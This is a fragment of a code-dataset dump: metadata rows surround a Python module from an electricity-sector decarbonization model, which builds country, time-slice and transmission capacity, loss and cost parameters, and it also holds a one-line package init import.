| 19 | 37 | 0.868421 | 5 | 38 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a2b93caa7e021ef11faa817317f239f8bb2da229 | 9,428 | py | Python | scripts/md_init_ins.py | chengtachu/GEDM | a34f0553602d543f25a731e2e2baa95c93d773ff | [
"MIT"
] | 1 | 2021-01-12T15:25:27.000Z | 2021-01-12T15:25:27.000Z | scripts/md_init_ins.py | qc-an/GEDM | ad373050e3bc089bb42789a3ad8584a100f7c7e0 | [
"MIT"
] | null | null | null | scripts/md_init_ins.py | qc-an/GEDM | ad373050e3bc089bb42789a3ad8584a100f7c7e0 | [
"MIT"
] | 2 | 2020-11-25T14:07:39.000Z | 2021-02-17T12:20:20.000Z | #
# General Electricity sector Decarbonization Model (GEDM)
# Copyright (C) 2020 Cheng-Ta Chu.
# Licensed under the MIT License (see LICENSE file).
#
# Module note:
# Functions to initialize instance settings
#
#----------------------------------------------------
# sets
#----------------------------------------------------
def getCountryIndList(objMarket):
""" get country index list in the market """
lsCountryList = list()
for objZone in objMarket.lsZone:
if objZone.iCountryIndex not in lsCountryList:
lsCountryList.append(objZone.iCountryIndex )
return lsCountryList
def getCountryCodeList(objMarket):
""" get country code list in the market """
lsCountryList = list()
for objZone in objMarket.lsZone:
if objZone.sCountry not in lsCountryList:
lsCountryList.append(objZone.sCountry )
return lsCountryList
#----------------------------------------------------
# Fixed Parameters
#----------------------------------------------------
def getZonesInCountry(objMarket, model):
''' get TS representing hours in a year '''
dData = {}
for sCountry in model.setCountryCode_CN:
sZoneList = ""
for objZone in objMarket.lsZone:
if objZone.sCountry == sCountry:
sZoneList = sZoneList + objZone.sZoneID + ";"
dData[sCountry] = sZoneList
return dData
##### time slice #####
def getTSRepHourYear(instance, model):
''' get TS representing hours in a year '''
dData = {}
for objTS in instance.lsTimeSlice:
dData[objTS.sTSIndex] = objTS.iRepHoursInYear
return dData
def getTSRepHourDay(instance, model):
''' get TS representing hours in a day '''
dData = {}
for objTS in instance.lsTimeSlice:
dData[objTS.sTSIndex] = objTS.iRepHoursInDay
return dData
def getTSRepHourYear_CE(instance, model):
''' get TS representing hours in a year, for CE model '''
dData = {}
for objTS in instance.lsTimeSlice_CEP:
dData[objTS.sTSIndex] = objTS.iRepHoursInYear
return dData
def getTSRepHourDay_CE(instance, model):
''' get TS representing hours in a day, for CE model '''
dData = {}
for objTS in instance.lsTimeSlice_CEP:
dData[objTS.sTSIndex] = objTS.iRepHoursInDay
return dData
def getTSIndInDay(instance, model):
''' get the set of index of the TS in a day '''
dData = {}
for sDay_DY in model.setDay_DY:
TSIndlist = ""
for objTS in instance.lsTimeSlice:
if (objTS.sMonth + objTS.sDay) == sDay_DY:
TSIndlist = TSIndlist + objTS.sTSIndex + ";"
TSIndlist = TSIndlist[0:-1] # remove the last ";"
dData[sDay_DY] = TSIndlist
return dData
def getTSIndInDay_CE(instance, model):
''' get the set of index of the TS in a day, for CE model '''
dData = {}
for sDay_DY in model.setDay_DY:
TSIndlist = ""
for objTS in instance.lsTimeSlice_CEP:
if (objTS.sMonth + objTS.sDay) == sDay_DY:
TSIndlist = TSIndlist + objTS.sTSIndex + ";"
TSIndlist = TSIndlist[0:-1] # remove the last ";"
dData[sDay_DY] = TSIndlist
return dData
def getTSRepHourYear_Day(model, objDayTS):
''' get the TS representing hours in a year '''
dData = {}
for objTS in objDayTS.lsDiurnalTS:
dData[objTS.sTSIndex] = objTS.iRepHoursInYear
return dData
def getTSRepHourDay_Day(model, objDayTS):
''' get the TS representing hours in a day '''
dData = {}
for objTS in objDayTS.lsDiurnalTS:
dData[objTS.sTSIndex] = objTS.iRepHoursInDay
return dData
#----------------------------------------------------
# Transmission Parameters
#----------------------------------------------------
def getTransCapacity(model, objMarket, iYear):
''' get transmission capacity of terrestrial links '''
dData = {}
for sTrans in model.setTransLDZ_TRL:
for objTrans in objMarket.lsTrans:
if objTrans.sTransID == sTrans:
if iYear in objTrans.dicTransAccCap_YS:
dData[sTrans] = objTrans.dicTransAccCap_YS[iYear]
else:
dData[sTrans] = 0
break
return dData
def getTransCapacityOffs(model, objMarket, iYear):
''' get transmission capacity of offhsore links '''
dData = {}
for sTrans in model.setTransOFZ_TRF:
for objTrans in objMarket.lsTrans_off:
if objTrans.sTransID == sTrans:
if iYear in objTrans.dicTransAccCap_YS:
dData[sTrans] = objTrans.dicTransAccCap_YS[iYear]
else:
dData[sTrans] = 0
break
return dData
def getTransLoss(model, objMarket, ind_year):
''' get transmission loss of terrestrial links '''
dData = {}
for sTrans in model.setTransLDZ_TRL:
for objTrans in objMarket.lsTrans:
if objTrans.sTransID == sTrans:
if objTrans.fDistance > 600:
# HVDC 600km as break point
dData[sTrans] = (objTrans.fDistance / 1000 * objMarket.lsDCLineLoss[ind_year] / 100) \
+ (objMarket.lsDCConvLoss[ind_year] / 100)
else:
# line loss of HVAC lines
dData[sTrans] = objTrans.fDistance / 1000 * objMarket.lsACLineLoss[ind_year] / 100
break
return dData
def getTransLossOffs(model, objMarket, ind_year):
''' get transmission loss of offshore links '''
dData = {}
for sTrans in model.setTransOFZ_TRF:
for objTrans in objMarket.lsTrans_off:
if objTrans.sTransID == sTrans:
# assume all HCAV
dData[sTrans] = (objTrans.fDistance / 1000 * objMarket.lsDCLineLoss[ind_year] / 100) \
+ (objMarket.lsDCConvLoss[ind_year] / 100)
break
return dData
def getTransCost(model, objMarket, ind_year):
''' get transmission cost of terrestrial links '''
##### cost assumptions #####
HVAC_CAPEX = objMarket.lsACCapex[ind_year] # USD per kW km
HVAC_OPEX = objMarket.lsACOpex[ind_year] # USD per kW km
HVDC_CAPEX = objMarket.lsDCCapex[ind_year] # USD per kW km
HVDC_OPEX = objMarket.lsDCOpex[ind_year] # USD per kW km
HVDC_CAPEX_converter = objMarket.lsDCCapexConv[ind_year] # USD per kW
HVDC_OPEX_converter = objMarket.lsDCOpexConv[ind_year] # USD per kW
CRF = objMarket.lsCRF[ind_year] / 100 # lifetime 50 years, discount rate 5%
dData = {}
for sTrans in model.setTransLDZ_TRL:
for objTrans in objMarket.lsTrans:
if objTrans.sTransID == sTrans:
distance = objTrans.fDistance
if distance > 0:
CostPerMW = 0
if distance > 600: # HVDC 600km as break point
# annual cost per MW
CostPerMW = distance * (HVDC_CAPEX*CRF + HVDC_OPEX) * 1000
# converter cost per MW
CostPerMW = CostPerMW + ( (HVDC_CAPEX_converter*CRF + HVDC_OPEX_converter) * 1000 )
# change unit from USD per MW to M.USD per MW
CostPerMW = CostPerMW / 1000000
else: # HVAC
# annual cost per MW
CostPerMW = distance * (HVAC_CAPEX*CRF + HVAC_OPEX) * 1000
# change unit from USD per MW to M.USD per MW
CostPerMW = CostPerMW / 1000000
dData[sTrans] = CostPerMW
else:
dData[sTrans] = 9999
break
return dData
def getTransCostOffs(model, objMarket, ind_year):
''' get transmission cost of offshore links '''
##### cost assumptions #####
HVDC_CAPEX = objMarket.lsDCCapex[ind_year] # USD per kW km
HVDC_OPEX = objMarket.lsDCOpex[ind_year] # USD per kW km
HVDC_CAPEX_converter = objMarket.lsDCCapexConv[ind_year] # USD per kW
HVDC_OPEX_converter = objMarket.lsDCOpexConv[ind_year] # USD per kW
CRF = objMarket.lsCRF[ind_year] / 100 # lifetime 50 years, discount rate 5%
dData = {}
for sTrans in model.setTransOFZ_TRF:
for objTrans in objMarket.lsTrans_off:
if objTrans.sTransID == sTrans:
distance = objTrans.fDistance
if distance > 0:
CostPerMW = 0
# annual cost per MW
CostPerMW = distance * (HVDC_CAPEX*CRF + HVDC_OPEX) * 1000
# converter cost per MW
CostPerMW = CostPerMW + ( (HVDC_CAPEX_converter*CRF + HVDC_OPEX_converter) * 1000 )
# change unit from USD per MW to M.USD per MW
CostPerMW = CostPerMW / 1000000
dData[sTrans] = CostPerMW
else:
dData[sTrans] = 9999
break
return dData
| 34.283636 | 107 | 0.555155 | 949 | 9,428 | 5.432034 | 0.173867 | 0.028516 | 0.03259 | 0.025218 | 0.82192 | 0.82192 | 0.777498 | 0.746654 | 0.688264 | 0.641125 | 0 | 0.018217 | 0.336233 | 9,428 | 274 | 108 | 34.408759 | 0.805529 | 0.201952 | 0 | 0.802469 | 0 | 0 | 0.000409 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104938 | false | 0 | 0 | 0 | 0.209877 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a2ec7a207dbf87a2092479c3f4ae30d8e8e6fbce | 36 | py | Python | clickhouse_bundle/__init__.py | applauncher-team/clickhouse_bundle | 484e048ebe57685ffccdc2bfd049b68fdae07795 | [
"Apache-2.0"
] | null | null | null | clickhouse_bundle/__init__.py | applauncher-team/clickhouse_bundle | 484e048ebe57685ffccdc2bfd049b68fdae07795 | [
"Apache-2.0"
] | null | null | null | clickhouse_bundle/__init__.py | applauncher-team/clickhouse_bundle | 484e048ebe57685ffccdc2bfd049b68fdae07795 | [
"Apache-2.0"
] | null | null | null | from .bundle import ClickhouseBundle | 36 | 36 | 0.888889 | 4 | 36 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.969697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.